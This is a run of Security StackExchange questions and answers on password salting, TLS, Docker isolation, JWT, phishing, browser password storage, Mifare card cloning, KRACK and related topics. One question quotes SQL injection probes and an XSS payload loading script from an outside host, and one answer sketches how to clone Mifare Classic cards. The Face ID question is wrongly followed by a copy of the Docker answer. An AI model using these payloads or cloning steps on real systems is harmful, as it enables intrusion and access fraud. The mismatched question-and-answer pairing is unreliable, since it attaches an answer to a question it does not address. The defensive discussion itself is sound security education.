free, but one hash iteration is sufficient. Do switch from MD5 to SHA256 though, and maybe consider going to 32 char passwords. Human brain passwords Commenters on this thread seem obsessed with the idea that, despite your statement that the site generates passwords, users can in fact choose their own passwords. As soon as the user has the possibility to change the password, the a single hash iteration is no option for storing the now low-entropy password. In this case you are correct that you need to do all the best practice things for password storage. Salting Either way (user-chosen or random passwords) you probably want a per-user salt. If user-chosen , then salts are part of the best practices. 'nuff said. If random , @GordonDavisson points out a really nice attack in comments [1] , [2] based on the observation that a db lookup is essentially free compared to a hash computation. Computing a hash and comparing it against all users' hashes is essentially the same cost as comparing it against a specific user's hash . So long as you're happy getting into any account (rather than trying to crack a specific account), then the more users in the system, the more efficient the attack. For instance, say you steal the unsalted hashed password db of a system with a million accounts (about 2 20 ). With 2 20 accounts, you statistically expect to get a hit in the first 2 60 guesses. You're still doing O(2 80 ) guesses , but O(2 60 ) hashes * O(2 20 ) db lookups ~= O(2 60 ) hashes. Per-user salts is the only way to prevent attacking all users for the cost of attacking one user .
{ "source": [ "https://security.stackexchange.com/questions/169320", "https://security.stackexchange.com", "https://security.stackexchange.com/users/158889/" ] }
169,368
I know the many benefits of SSL for the users of a website. It creates a contract whereby the user can be certain that the entity they're transacting with is who it claims to be and that the information passed is encrypted. I also have some idea about other benefits (e.g. speed benefits from HTTP/2). But something I was wondering recently was whether the website benefits in a similar way from this transaction. That is, does my website become more secure from attacks if I enable SSL? I suppose because I would also know that the client I'm transacting with is certified and information I send them is encrypted. But can't any client act unethically and access my website with self-signed certs, etc., claiming to be whoever they like? By the way, I've come into what knowledge I have in a self-directed way, so if this is a basic question or an XY problem don't hesitate to point me to elementary resources or set me straight. Edit: For everyone continuing to answer or comment with general reasons to use SSL: these are appreciated and no doubt of use to new users. That said, I do make it a part of each website I set up, and was curious specifically about the security benefits. In SE tradition I just want to remind people to keep to the question if possible. (Sorry about the title originally missing the key qualifier!)
You have a few good questions, and a few misconceptions. Let's try to untangle them. I also have some idea about other benefits (e.g. speed benefits from HTTP/2). Another important one: Search Engine Optimization since you get GooglePoints for having TLS. (which kinda feeds your point that webmasters need external incentives ...) I suppose because I would also know that the client I'm transacting with is certified and information I send them is encrypted. ... But can't any client [sic] access my website with self-signed certs? Yes and no, and yes, ... and no. Let's untangle this. TLS client authentication (requiring clients to present certs) is something you usually see on VPN servers, enterprise WPA2 WiFi access points, and corporate intranets. These are all closed systems where the sysadmin has full control over issueing certs to users, and they use this to control which users have access to which resources. This makes no sense in a public website setting, and is definitely a non-standard config for an HTTPS webserver. That said, what you do gain is this: Encrypted TLS session | Client loads login page | Client sends username / password | Client does "logged in things" So you do gain extra confidence that the user is who they say they are because the username / password is no longer sent in the clear, therefore no longer possible for a man-in-the-middle to intercept / modify / steal. After that any of the data the client sends to the server, or gets from the server, is end-to-end encrypted to the client. Generally you're right: this protects the client more than the server, but it does stop man-in-the-middles from injecting malicious stuff into files that the user uploads, injecting malicious commands to be executed as if they came from that user. But can't any client act unethically and access my website with self-signed certs, etc., claiming to be whoever they like? Kinda, yes. For a public website, anybody can open a TLS connection. If you want users to authenticate, you need to have a login mechanism on top, TLS has does not generally provide this for you (unless you're using the above-mentioned client cert mechanism). But something I was wondering recently was whether the website benefits in a similar way from this transaction. Basically, the benefits to the server are that any data sent to the user will only be viewed by the intended user. If, for example, you are sending them copies of their financial statements, then your lawyers will be very happy to hear this. It also means that any data received from the user did in fact come from that user, and not from an attacker pretending to be them. If your legitimate users are acting maliciously, well that's a different problem, after all, you chose to give them access to the system. What TLS (+ your own login framework) does is ensure that only legitimate users have access. What they do with that access is not TLS's problem.
{ "source": [ "https://security.stackexchange.com/questions/169368", "https://security.stackexchange.com", "https://security.stackexchange.com/users/145617/" ] }
169,642
I recently had a discussion with a Docker expert about the security of Docker vs. virtual machines. When I told that I've read from different sources that it's easier for code running within a Docker container to escape from it than for a code running in a virtual machine, the expert explained that I'm completely wrong, and that Docker machines are actually more secure in terms of preventing the malicious code from affecting other machines, compared to virtual machines or bare metal . Although he tried to explain what makes Docker containers more secure, his explanation was too technical for me. From what I understand, “OS-level virtualization reuses the kernel-space between virtual machines” as explained in a different answer on this site. In other words, code from a Docker container could exploit a kernel vulnerability, which wouldn't be possible to do from a virtual machine. Therefore, what could make it inherently more secure to use Docker compared to VMs or bare metal isolation, in a context where code running in a container/machine would intentionally try to escape and infect/damage other containers/machines? Let's assume Docker is configured properly, which prevents three of the four categories of attacks described here .
No, Docker containers are not more secure than a VM. Quoting Daniel Shapira : In 2017 alone, 434 linux kernel exploits were found , and as you have seen in this post, kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, thus trusting the built-in protection mechanisms alone isn’t sufficient. 1. Kernel exploits from a container If someone exploits a kernel bug inside a container, they exploited it on the host OS. If this exploit allows for code execution, it will be executed on the host OS, not inside the container. If this exploit allows for arbitrary memory access, the attacker can change or read any data for any other container. On a VM, the process is longer: the attacker would have to exploit both the VM kernel, the hypervisor, and the host kernel (and this may not be the same as the VM kernel). 2. Resource starvation As all the containers share the same kernel and the same resources, if the access to some resource is not constrained, one container can use it all up and starve the host OS and the other containers. On a VM, the resources are defined by the hypervisor, so no VM can deny the host OS from any resource, as the hypervisor itself can be configured to make restricted use of resources. 3. Container breakout If any user inside a container is able to escape the container using some exploit or misconfiguration, they will have access to all containers running on the host. That happens because the same user running the docker engine is the user running the containers. If any exploit executes code on the host, it will execute under the privileges of the docker engine, so it can access any container. 4. Data separation On a docker container, there're some resources that are not namespaced: SELinux Cgroups file systems under /sys , /proc/sys , /proc/sysrq-trigger , /proc/irq , /proc/bus /dev/mem , /dev/sd* file system Kernel Modules If any attacker can exploit any of those elements, they will own the host OS. A VM OS will not have direct access to any of those elements. It will talk to the hypervisor, and the hypervisor will make the appropriate system calls to the host OS. It will filter out invalid calls, adding a layer of security. 5. Raw Sockets The default Docker Unix socket ( /var/run/docker.sock ) can be mounted by any container if not properly secured. If some container mounts this socket, it can shutdown, start or create new images. If it's properly configured and secured, you can achieve a high level of security with a docker container, but it will be less than a properly configured VM. No matter how much hardening tools are employed, a VM will always be more secure. Bare metal isolation is even more secure than a VM. Some bare metal implementations (IBM PR/SM for example) can guarantee that the partitions are as separated as if they were on separate hardware. As far as I know, there's no way to escape a PR/SM virtualization.
{ "source": [ "https://security.stackexchange.com/questions/169642", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7684/" ] }
169,654
While unveiling iPhone X, Apple made a statement to this end: With Touch ID, it stated that there was a 1 in 50,000 chance that someone would be able to open your phone with their fingerprint. These numbers were a little better for Face ID, at 1 in 1,000,000. This seems strange as fingerprints are known to be quite unique , though I'm not sure how unique one's face is. In this answer , a graph puts face lower in security to fingerprint: Are these claims (by Apple) realistic and what is the possible maths behind them?
No, Docker containers are not more secure than a VM. Quoting Daniel Shapira : In 2017 alone, 434 linux kernel exploits were found , and as you have seen in this post, kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, thus trusting the built-in protection mechanisms alone isn’t sufficient. 1. Kernel exploits from a container If someone exploits a kernel bug inside a container, they exploited it on the host OS. If this exploit allows for code execution, it will be executed on the host OS, not inside the container. If this exploit allows for arbitrary memory access, the attacker can change or read any data for any other container. On a VM, the process is longer: the attacker would have to exploit both the VM kernel, the hypervisor, and the host kernel (and this may not be the same as the VM kernel). 2. Resource starvation As all the containers share the same kernel and the same resources, if the access to some resource is not constrained, one container can use it all up and starve the host OS and the other containers. On a VM, the resources are defined by the hypervisor, so no VM can deny the host OS from any resource, as the hypervisor itself can be configured to make restricted use of resources. 3. Container breakout If any user inside a container is able to escape the container using some exploit or misconfiguration, they will have access to all containers running on the host. That happens because the same user running the docker engine is the user running the containers. If any exploit executes code on the host, it will execute under the privileges of the docker engine, so it can access any container. 4. Data separation On a docker container, there're some resources that are not namespaced: SELinux Cgroups file systems under /sys , /proc/sys , /proc/sysrq-trigger , /proc/irq , /proc/bus /dev/mem , /dev/sd* file system Kernel Modules If any attacker can exploit any of those elements, they will own the host OS. A VM OS will not have direct access to any of those elements. It will talk to the hypervisor, and the hypervisor will make the appropriate system calls to the host OS. It will filter out invalid calls, adding a layer of security. 5. Raw Sockets The default Docker Unix socket ( /var/run/docker.sock ) can be mounted by any container if not properly secured. If some container mounts this socket, it can shutdown, start or create new images. If it's properly configured and secured, you can achieve a high level of security with a docker container, but it will be less than a properly configured VM. No matter how much hardening tools are employed, a VM will always be more secure. Bare metal isolation is even more secure than a VM. Some bare metal implementations (IBM PR/SM for example) can guarantee that the partitions are as separated as if they were on separate hardware. As far as I know, there's no way to escape a PR/SM virtualization.
{ "source": [ "https://security.stackexchange.com/questions/169654", "https://security.stackexchange.com", "https://security.stackexchange.com/users/107218/" ] }
169,678
I read today about the CCleaner hack and how code was injected into their binary. People were able to download and install the compromised software before the company had noticed. Isn't this what digital signatures are for? Would signing the binary or providing a checksum have done anything to prevent this? To add to the confusion, in this Reuters news article a researcher claims they did have a digital signature: “There is nothing a user could have noticed,” Williams said, noting that the optimization software had a proper digital certificate, which means that other computers automatically trust the program. How could the OS accept to install a software with an invalid signature? Or can an attacker change the binary and forge the signature?
Based on the incomplete details that have been released so far, the malicious code was inserted before compilation and signing (e.g. on a developer's machine, or on a build server). As a result, the compromised version was signed by exactly the same processes as would be used by the uncompromised version. The flaw was introduced before the signing of the binary took place. Similarly, a checksum would have been calculated based on the results of the compilation, by which point, the malicious code was already present. This is a weak point in all signing architectures - if the process before the signature is compromised, there is no real way to detect it. It doesn't mean they're unhelpful - if the attackers didn't get access to the systems until after the signature had been applied, the tampering would have been detected easily, since the signature wouldn't have matched.
{ "source": [ "https://security.stackexchange.com/questions/169678", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
169,771
An interesting feature of HTML5 is the <input pattern="" /> attribute , which allows the browser to validate the input field's value against a regular expression provided by the developer. Subsequently, this binds to the field's ValidityState which can then be queried for UX feedback, to prevent invalid submission, and so on. The server implements the same precondition validation (as well as XSRF). Given this, is this client-side validation pattern mature and adequate , or is it for some reason still desirable to intercept the entire form and subject it to traditional per-field validation before submitting it?
From a security perspective, you need to revalidate everything on the server. This will always be the case, no matter how pretty and advanced HTML5 features become. You simply can not trust the client. You have no idea if it will follow the HTML5 rules or not. You don't even know if it is a browser. So should you validate the whole form with your own JS client side before submitting it, even if you use the HTML5 features? From a security perspective it doesn't matter. Client side validation have zero security value anyway - see above - so from a security perspective you might just as well not bother doing it at all. Client side validation is purely about user experience. If your own JS validation or HTML5 built in makes for the best UX is an interesting question, but it is not on topic here.
{ "source": [ "https://security.stackexchange.com/questions/169771", "https://security.stackexchange.com", "https://security.stackexchange.com/users/548/" ] }
169,782
Is there any definitive way to tell if an email is a phishing attempt? What cues should the "average computer" user employ to detect a phishing email?
There are a number of both technical and non-technical ways that someone can identify a phishing attempt. Communicate out of Band. The easiest reliable way is to communicate with the proposed sender out-of-band. Call them, send them a what's app if applicable, signal, whatever. If an organization or an individual didn't send you an email they can tell you over the phone. Just remember to use a phone number that is not included in the email. Proofreading - Much of the spam, even a lot of spear phishing, is very poorly written. Poorly constructed sentences and spelling errors are pretty good indicators of Spam. Hovering over links - Phishing links will typically be "obfuscated" to look like they link to a login page. For instance the text may be https://login.facebook.com however when you hover over the link you notice it's some long verbose domain name. Tell-tale phishing. EDIT : As Mehrdad and Bacon Brad have pointed out this method may provide mixed results. Links can be used in a variety of attacks such as CSRF / XSS attacks, and the link provided may also lead to an authorized third party. Email Headers - Perhaps one of the more tech-savvy way of telling whether or not an email is legitimate is by looking at the E-mail Headers . E-mails contain metadata that states where emails originated from. You can usually tell by looking at the email header if an email originated from an authenticated source with these headers. Note that this is not foolproof as many organizations may outsource mail campaigns, but email coming from a private IP address could indicate a phishing email. Macros - Does the word doc you've just been sent state you need to enable macros in order to see the document? Don't you go doing that. Social Engineering - Many phishing email tactics will play off human emotions and employ many well known Social Engineering techniques. Statements like "You must click on this link and re-activate your bank account within 24 hours or your account will be closed" are meant to make the receiver panic. When we panic we make illogical decisions. If you feel an email is playing off your emotions you might be getting phished. Is this normal behaviour? - Institutions are well versed in the ways of phishing and as such they are not going to ask you to click on embedded links in an email to "reset your password" or "confirm your account". If your spidey sense is tingling, probably phishing. In my experience there is no one silver bullet in dealing with phishing. During penetration tests spear phishing always works. The above information will help you spot attempts to phish you, but the easiest and most efficient way to confirm or deny a phishing attempt is to call the "sender" to confirm if it's legitimate.
{ "source": [ "https://security.stackexchange.com/questions/169782", "https://security.stackexchange.com", "https://security.stackexchange.com/users/119035/" ] }
170,378
I was looking through some data in our database when I came across a bunch of weird user_id entries: user_id -1080) ORDER BY 1# -1149 UNION ALL SELECT 79,79,79,79,79,79,79,79,79# -1359' UNION ALL SELECT 79,79,79,79,79,79,79,79,79,79-- JwSh -1409' ORDER BY 2678# -1480' UNION ALL SELECT 79,79,79# -1675 UNION ALL SELECT 79,79,79# -1760 UNION ALL SELECT 79,79,79,79,79,79,79-- znFh -1817 UNION ALL SELECT 79,79,79,79,79,79# -1841 UNION ALL SELECT 79,79,79,79,79,79,79,79,79-- WiHF -2265) UNION ALL SELECT 79,79,79,79,79,79# -2365 UNION ALL SELECT 79,79,79,79,79,79,79# -2387%' UNION ALL SELECT 79,79,79,79,79-- PHug -2535') UNION ALL SELECT 79,79,79,79,79,79# -2670%' ORDER BY 1# -2847 ORDER BY 2974-- vCjk -2922%' UNION ALL SELECT 79,79,79-- PgNW -3097%' UNION ALL SELECT 79,79,79,79,79,79,79-- vJzG -3675 UNION ALL SELECT 79,79,79# It doesn't seem like anything malicious is being attempted, so part of me thinks this might have been caused by some sort of bug, but then again it is rather suspicious to see SQL inside data entries. What could it be trying to do? Here are a few more examples I found which may be interesting: "><script src=http://xs7x.win/yRjYja></script>JSON #36* "><script src=http://xs7x.win/yRjYja></script>JSON #98* (SELECT CONCAT(0x717a627071,(SELECT (ELT(2849=2849,1))),0x716b627871))
This is the result of someone trying to exploit an SQL injection on your site. Someone tried to detect if your website was vulnerable to a union-based injection . For all the records that you see, it doesn't seem to have worked. You should check your access and error-logs for the affected timespan to see if any further requests were made. One suspicious thing I noticed is that I don't see any entries containing double quotation marks (") which might indicate that they broke the functionality of the site or an injection using double quotation marks worked against your site. You might want to check the relevant source code to see if proper sanitization of parameter values was done. This could also be explained if some other part of your setup blocked requests with double-quotation marks or injections with them were just not attempted.
{ "source": [ "https://security.stackexchange.com/questions/170378", "https://security.stackexchange.com", "https://security.stackexchange.com/users/68338/" ] }
170,388
Context : Angular site is hosted on S3 behind CloudFront, separate from Express server that is used as API and almost all requests are XMLHttpRequests. All requests are sent without cookies (withCredentials = false by default) and I use JWT Bearer token for authentication by taking it from cookies in angular and placing to Authorization header (This technique is kind of what is described in CSRF Wiki page ). On Express site I do not allow Cookie header in Access-Control-Allow-Headers . Cookies have secure: true flag, and are NOT httpOnly because I need to manually access them in angular. Also I've read in this Medium article that JSON-Web-Tokens(JWT )/Bearer Tokens is without a doubt one of the best methods of preventing CSRF Question 1 : Will I add extra security if I'll add X-XSRF-Token header to each request and for example make the mechanism stateless by checking for that same value in JWT payload? (I'we read about it in this thread ) Question 2 : Do I actually need extra security efforts agains CSRF taking all that I described?
This is relevant but doesn't necessarily answer 100% of your question: https://security.stackexchange.com/a/166798/149676 The short of it is that as long as authentication isn't automatic (typically provided by the browser) then you don't have to worry about CSRF protection. If your application is attaching the credentials via an Authorization header then the browser can't automatically authenticate the requests, and CSRF isn't possible. Therefore, I would re-word the quote from your article slightly: it isn't that Bearer Tokens are the best defense against CSRF attacks, but simply that CSRF is an attack vector that specifically attacks requests where the browser automatically provides authentication (typically cookies and basic authentication), and so CSRF doesn't matter if the browser can't authenticate you. You should probably make sure and verify, server-side, that your application isn't silently falling back to cookie validation if the Bearer token is absent. I could see something like that squeaking into an application by accident, and since the cookies will get sent along whether you want them to or not, it could result in an inadvertent CSRF vulnerability on a page that is was "supposed" to be immune to CSRF. As a result, I think both your questions one and two can be answered the same way. If you only use authentication via Bearer tokens and not via cookies, then there is no concern of CSRF vulnerability, and no extra steps are required for security.
{ "source": [ "https://security.stackexchange.com/questions/170388", "https://security.stackexchange.com", "https://security.stackexchange.com/users/159401/" ] }
170,481
Whenever I enter a login into a new site, Chrome asks me if it should store the login details. I used to believe this was fairly secure. If someone found my computer unlocked, they could get past the login screen for some website using the stored details, but if asked for the password again like during checkout, or if they wanted to login to the service from another device, they would be out of luck. At least, that's what I used to think when I believed the browser did not store the password itself, but a hash or encryption of the password. I have noticed that the browser fills the username and password fields, and the password field indicates the number of characters in the password. I'm one of those people who when asked to change their password just keeps the same password, but changes a number at the end. I know this is bad, but with how often I am asked to change passwords, I really could not remember the number of passwords expected of me. This results in a lot of passwords that are the same, but sometimes I forget what the end number needs to be for a particular login. I could not remember the ending number for a certain login, so I went to a website where the password was stored. I deleted the last couple of characters and tried different numbers and viola, knew what was the right ending number. It seems to me that this is a fundamental security flaw. If I can check the last character of my password without checking any others, then the amount of tries it takes to crack the password grows linearly with the number of characters not exponentially. It seems like a short stride from there to say that if someone came to my computer when it was unlocked, a simple script could extract all of the stored passwords for all of the major websites which I have passwords stored for. Is this not the case? Is there some other layer of security that would prevent this?
Chrome not only stores your password text, it will show it to you. Under settings -> advanced -> manage passwords you can find all your passwords for all your sites. Click show on any of them and it will appear in the clear. Hashed passwords work for the site authenticating you. They are not an option for password managers. Many will encrypt the data locally, but the key will also be stored locally unless you have a master password setup. Personally, I use the chrome password manager and I find it convenient. I also, however, have full disk encryption and lock my screen diligently. Which makes the risk reasonable imho. You seem to be inconsistent (many are) by both selecting memorable passwords and using a password manager. And I may venture to guess you may even repeat the password or at least the theme across many sites. This gives you the worst of both worlds. You get the risks of password manager without the benefits. With a password manager you trust, you can give each site a unique random password not memorable at all and gain a lot of protection from many very real attack vectors. In exchange for a single point of failure of your password manager. Even with a less than perfect password manager this isn't an unreasonable trade off. With a good password manager this is becoming the consensus best practice. Edit to add: please read Henno Brandsma answer explaining how login password and OS support can be used to encrypt passwords, this gives a reasonable level of protection to your passwords when the computer is off/locked (full disk encryption is better) and won't help much if you leave your computer unlocked. Even if the browser requires password to show plain text debug tools will still let you see already filled passwords as @Darren_H comments. The previous recommendation still stands use random unique passwords and a password manager.
{ "source": [ "https://security.stackexchange.com/questions/170481", "https://security.stackexchange.com", "https://security.stackexchange.com/users/160273/" ] }
170,599
Sorry for this possibly silly question, I'm just learning about JWT so please bear with me... I read the JWT docs extensively but I don't understand what prevents a hacker from hijacking the JWT and posing as the user for which it was originally issued. Here's the scenario I'm worried about: suppose a bad actor is somehow able to sniff traffic on my corporate network and also has a simple account on my site. If he is able to find an employee user who has admin or special permissions, can't he log in to the site, receive his SSL cookie, then hijack the employee's JWT and pose as that user now and gain those special permissions? Since I won't be checking the bad actor's credentials again, only their JWT, it seems to me the bad actor could submit the JWT using the site SSL through his simple account... What part of the puzzle am I missing here? Thank you!
JWT are only an encapsulation of information into a string with the ability to encrypt these information and detect tampering. JWT by themselves don't protect against cookie theft or misuse done with sniffing, XSS, CSRF, browser extensions or similar. This means you still need to employ the usual methods to protect the token or cookie against misuse, i.e. use http-only cookies to protect against XSS, use TLS to protect against sniffing, use CSRF tokens or other techniques to protect against CSRF etc. And you might include some information in the protected token which make misuse harder, like a fingerprint of the browser, source IP of the user etc - see OWASP: Binding the Session ID to Other User Properties . Of course you need to verify these information each time the cookie is used for authorization.
{ "source": [ "https://security.stackexchange.com/questions/170599", "https://security.stackexchange.com", "https://security.stackexchange.com/users/160322/" ] }
170,756
The head of our IT department and Networking class in my college has given me and another student a challenge; he told us that if we could clone the NFC tags in our student ID's used to sign in on time, he would give one of us unlimited access to the colour printers for a year. His main motto that he always talks about though is encouraging students to learn through experimentation regardless of whether the students ideas will work or not. He wants us to experience failure as well as success through our own attempts. I'm a bit skeptical as to whether it will work because I've read forums online that say this a futile attempt because no reputable academic institution or business would leave their NFC tags unprotected and completely vulnerable to complete cloning. From scanning the card with my Android phone, I see that it uses a Mifare Classic 1k tag. Does anyone have an idea how to replicate it? There are some cheap tags on eBay but I wonder if I should bother if it's not even possible to clone it.
Many NFC enabled smartphones can write to these cards with an app like MifareClassicTool . However I've found several phones seem to be able to do it when in reality trying to write to Sector-0 bricks the card. It may be worth testing one or two cards and if it doesn't work buy a dedicated USB writer. First of all a huge number of Mifare Classic Systems only use the ID on the card. This is stored in Sector-0 which is theoretically read only. Of course plenty of online sources will happily sell you cards where this is writable. Writing to the cards themselves is trivial. The encryption on the cards has also been broken and again can be trivially cracked on a smartphone, as seen on Wikipedia: Security of MIFARE Classic, MIFARE DESFire and MIFARE Ultralight . My university used the same cards. As did an Oracle facility I used to work at…
{ "source": [ "https://security.stackexchange.com/questions/170756", "https://security.stackexchange.com", "https://security.stackexchange.com/users/156813/" ] }
170,833
I have an upcoming oral network security exam and know that in past exams, the professor asked about why TLS requires TCP. I know that there is DTLS but it wasn't part of the lecture. So the question is about what advantage TLS gains by requiring its underlying protocol to be TCP, I guess. I already heard some wild guesses but no convincing arguments. In the beginning of the RFC, it says : At the lowest level, layered on top of some reliable transport protocol (e.g., TCP [TCP]), is the TLS Record Protocol. Seemingly everywhere else (according to my judgment), the RFC doesn't only require "some reliable transport protocol" but TCP in particular.
TLS requires a reliable transport. On the internet, this leaves only TCP, as UDP does not offer reliability. TLS does require a reliable transport because (in compliance with the layered architecture of the ISO/OSI reference model) it does not handle transport errors, lost packets or other disturbances that may occur with IP. TLS is designed to offer a secure channel on top of a reliable transport and it does this quite well. DTLS does (I assume) the necessary error handling within the protocol. If TLS was to be performed over UDP, connections and handshakes could fail just because a packet got lost in transit and no one noticed. Mitigation of such problems is (according to the ISO/OSI reference model) the designated task of a reliable transport. Any reliable transport works theoretically, yet for all practical purposes of IP networks, this usually implies TCP.
{ "source": [ "https://security.stackexchange.com/questions/170833", "https://security.stackexchange.com", "https://security.stackexchange.com/users/88961/" ] }
171,022
In my application, users have certain roles which have permissions. These permissions dictate which UI elements are available to them at the home screen. Many of the elements link to other pages, which many users cannot see because their permissions do not allow them to go to that web page. For example, a button called button1 links to a random page in the application, let's say http://www.example.com/example.jsp . The user John however, has permissions set that don't allow him to see button1 . Therefore John cannot go to http://www.example.com/example.jsp . The issue I'm having is that if I am signed in as John, and I paste that URL, it will take me to the page. Obviously this is a huge security risk if an attacker gets the URL to an administrator page for example. So, how can I protect against this? Do I need to verify the user for every single page, checking permissions and making sure that they are allowed to be there? There are hundreds of pages in this application and that seems very redundant and not efficient to include code on every page to do so. Is there an easier way to do this than the method I just mentioned?
Do I need to verify the user for every single page? Absolutely. Not only every page, but every request to a privileged resource, e.g POST request to update data, delete, view, etc, etc. It is not just about viewing the pages, it is about controlling who can do what on your system. It sounds like your entire authentication and permissions system is broken in its current implementation. The steps to remedy this are too broad for this one answer. It would be worth a general search of this forum and the wider net to find solutions suitable for your framework (JSP, ASP.Net, PHP, etc.). Most frameworks have out-of-the-box functionality for solving this problem. A good start would be this high level guide from OWASP: Operational Security: Administrative Interfaces .
{ "source": [ "https://security.stackexchange.com/questions/171022", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128304/" ] }
171,055
Yesterday I was searching DuckDuckGo for booking a vacation. I ended up reading a lot on one specific website. Today multiple websites show me Google banners from this specific website. Normally, I never look up websites for booking a vacation. I use DuckDuckGo on purpose, to prevent these kind of things. My question therefore is: how is this possible? I'm 100% certain that I didn't accidentally Google something. The website I was reading was this , if that helps.
Loading that page loads https://www.googleadservices.com/pagead/conversion.js https://www.googletagmanager.com/gtm.js?id=GTM-WPPRGM https://stats.g.doubleclick.net/dc.js The reason Google can track you is that the website shares details of your visit with them - in this case via loading Google JavaScript code for their ads service. *To expand on this - The Google ad code will use a cookie to track you. But even if it didn't there are browser fingerprinting mechanisms which in most cases can correctly identify a user's machine even after a full browser cache / history clear. When you visit a site with ads a request is made to the ad providers server. This sends the ID associated with you to say "an ad on [x website] for [user y] is available. The ad providers nowadays often then real-time auction off the slot in 1/100th of a second - where potential advertisers computers can bid for the advert space. The site you visited is djoser. Since djoser knows you looked at products on their site yesterday they know there is a reasonable chance you are considering buying something from them. So when you visit another site somewhere else, the ad slot on that other site is more valuable to djoser, and they bid higher than anyone else - hence why you keep seeing them.
{ "source": [ "https://security.stackexchange.com/questions/171055", "https://security.stackexchange.com", "https://security.stackexchange.com/users/59594/" ] }
171,354
I'm working for an ecommerce website written in C#.net (no CMS used, quite a lot of code) where security hasn't been a priority for a long time. My mission right now is to find and fix any XSS breaches. There is a lot of non-filtered data written directly in the rendered HTML. What is my best strategy to cure the code without having to read every single page?
I propose the following four step program, where you first pick the low hanging fruit to give you some minimum of protection while you work on the bigger problems. 1. Activate client side filtering 1.1 Set the X-XSS-Protection header Setting the following HTTP response header will turn on the browsers built in XSS protection: X-XSS-Protection: 1; mode=block This is by no means waterproof, and it only helps against reflected XSS, but it's something. Some old versions of IE (surprise, surprise) have a buggy filter that actually might make things worse, so you might want to filter out some user agents. 1.2 Set a content security policy If you do not use inline JavaScript in your app, a CSP can help a lot. Setting script-src 'self' will (a) limit script tags to only include scripts from your own domain, and (b) disable inline scripts. So even if an attacker could inject <img onerror="alert('XSS')"> the browser will not execute the script. You will have to tailor the value you use for the header to your own use, but the linked MDN resource should help you with that. But again, this is not waterproof. It does nothing to help users with a browser that doesn't implement CSP (see here ). And if your source is littered with inline scripts you will have to choose between cleaning that up or abstaining from using CSP. 2. Activate server side filtering John Wu has a good suggestion in comments: Also, since this is .NET, a very quick and easy change can turn on ASP.NET Request Validation which can catch a variety of XSS attacks (but not 100% of them). If you are working in another language, you might instead consider using a web application firewall (as suggested by xehpuk ). How easy a WAF is to configure for you depends on what application you are protecting. If you are doing things that makes filtering inherently hard (e.g. pass HTML in GET or POST parameters) it might not be worth the effort to configure one. But again, while a WAF might help, it is still not waterproof. 3. Scan and fix Use an automated XSS scanner to find existing vulnerabilities and fix these. As a complement you can run your own manual tests. This will help you focus your precious time on fixing easy to find vulnerabilities, giving you the most bang for the buck in the early phase. But for the third time, this is not waterproof. No matter how much you scan and test, you will miss something. So, unfortunately, there is a point #4 to this list... 4. Clean up your source code Yes, you will "have to read every single page". Go through the source and rewrite all code that outputs data using some kind of framework or template library that handles XSS issues in a sane way. (You should probably pick a framework and start using it for the fixes you do under #3 already.) This will take a lot of time, and it will be a pain in the a**, but it needs to be done. Look at it from the bright side - you have the opportunity to do some additional refactoring while you are at it. In the end you will not only have solved your security problem - you will have a better code base as well.
{ "source": [ "https://security.stackexchange.com/questions/171354", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80876/" ] }
171,356
Today new research was published on vulnerabilities in wireless network security called Krack . What are the real-world consequences of these attacks for users and owners of wireless networks, what can an attacker actually do to you? Also is there anything a wireless network owner can do apart from contact their vendor for a patch?
Citing the relevant parts from https://www.krackattacks.com : Who is vulnerable? Both clients and access points are listed in the paper as being vulnerable. See the tables 1 and 2 on pages 5 and 8 for examples of vulnerable systems, and table 3 on page 12 for an overview of which packets can be decrypted. The weaknesses are in the Wi-Fi standard itself, and not in individual products or implementations. Therefore, any correct implementation of WPA2 is likely affected. [...] the attack works against personal and enterprise Wi-Fi networks, against the older WPA and the latest WPA2 standard, and even against networks that only use AES. What is the impact? adversaries can use this attack to decrypt packets sent by clients , allowing them to intercept sensitive information such as passwords or cookies. The ability to decrypt packets can be used to decrypt TCP SYN packets. This allows an adversary to [...] hijack TCP connections. [An adversary can thus inject] malicious data into unencrypted HTTP connections. If the victim uses either the WPA-TKIP or GCMP encryption protocol, instead of AES-CCMP, the impact is especially catastrophic. Against these encryption protocols, nonce reuse enables an adversary to not only decrypt, but also to forge and inject packets. our attacks do not recover the password of the Wi-Fi network (Emphases mine.) Can we patch it (and will we have incompatible APs/clients)? There is a fix for both APs and clients, it doesn't matter which one you patch first. implementations can be patched in a backwards-compatible manner [...] To prevent the attack, users must update affected products as soon as security updates become available. [...] a patched client can still communicate with an unpatched access point, and vice versa. However, both client and router must be patched (or confirmed secure): both the client and AP must be patched to defend against all attacks [...] it might be that your router does not require security updates. We strongly advise you to contact your vendor for more details [...] For ordinary home users, your priority should be updating clients such as laptops and smartphones. How does it work? When a client joins a network, it [...] will install this key after receiving message 3 of the 4-way handshake. Once the key is installed, it will be used to encrypt normal data frames using an encryption protocol. However, because messages may be lost or dropped, the Access Point (AP) will retransmit message 3 if it did not receive an appropriate response as acknowledgment. [...] Each time it receives this message, it will reinstall the same encryption key, and thereby reset the incremental transmit packet number (nonce) and receive replay counter used by the encryption protocol. We show that an attacker can force these nonce resets by collecting and replaying retransmissions of message 3 of the 4-way handshake. By forcing nonce reuse in this manner, the encryption protocol can be attacked, e.g., packets can be replayed, decrypted, and/or forged. Is there anything a wireless network owner can do apart from contact their vendor for a patch? As mentioned, WPA-TKIP or GCMP are slightly worse, so make sure you use AES-CCMP for the lowest impact -- if your router allows you to choose that (many don't). Other than that, you can't truly mitigate it on a protocol level yourself. Just update as soon as possible. Generally, use HTTPS for anything that needs to be secure (you should do this anyway, also over ethernet, but especially over Wi-Fi now), use a VPN as an extra layer, etc.
{ "source": [ "https://security.stackexchange.com/questions/171356", "https://security.stackexchange.com", "https://security.stackexchange.com/users/37/" ] }
171,402
